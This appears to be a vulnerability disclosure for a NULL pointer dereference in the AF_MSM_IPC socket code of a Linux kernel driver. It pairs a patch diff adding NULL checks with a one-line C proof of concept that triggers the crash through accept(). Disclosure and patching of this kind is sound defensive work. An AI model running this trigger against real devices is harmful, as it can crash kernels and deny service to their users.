Description
NULL pointer dereference when processing accept system call by user process on AF_MSM_IPC sockets.
The patch is as follows:
diff --git a/net/ipc_router/ipc_router_socket.c b/net/ipc_router/ipc_router_socket.c
index 828797b..652531a 100644
--- a/net/ipc_router/ipc_router_socket.c
+++ b/net/ipc_router/ipc_router_socket.c
@@ -555,10 +555,18 @@ static unsigned int msm_ipc_router_poll(struct file *file,
static int msm_ipc_router_close(struct socket *sock)
{
struct sock *sk = sock->sk;
- struct msm_ipc_port *port_ptr = msm_ipc_sk_port(sk);
+ struct msm_ipc_port *port_ptr;
int ret;
+ if (!sk)
+ return -EINVAL;
+
lock_sock(sk);
+ port_ptr = msm_ipc_sk_port(sk);
+ if (!port_ptr) {
+ release_sock(sk);
+ return -EINVAL;
+ }
ret = msm_ipc_router_close_port(port_ptr);
msm_ipc_unload_default_node(msm_ipc_sk(sk)->default_node_vote_info);
release_sock(sk);
Poc
#include <sys/socket.h>
#define AF_MSM_IPC 27
void main()
{
accept(socket(AF_MSM_IPC, SOCK_DGRAM, 0), 0, 0);
}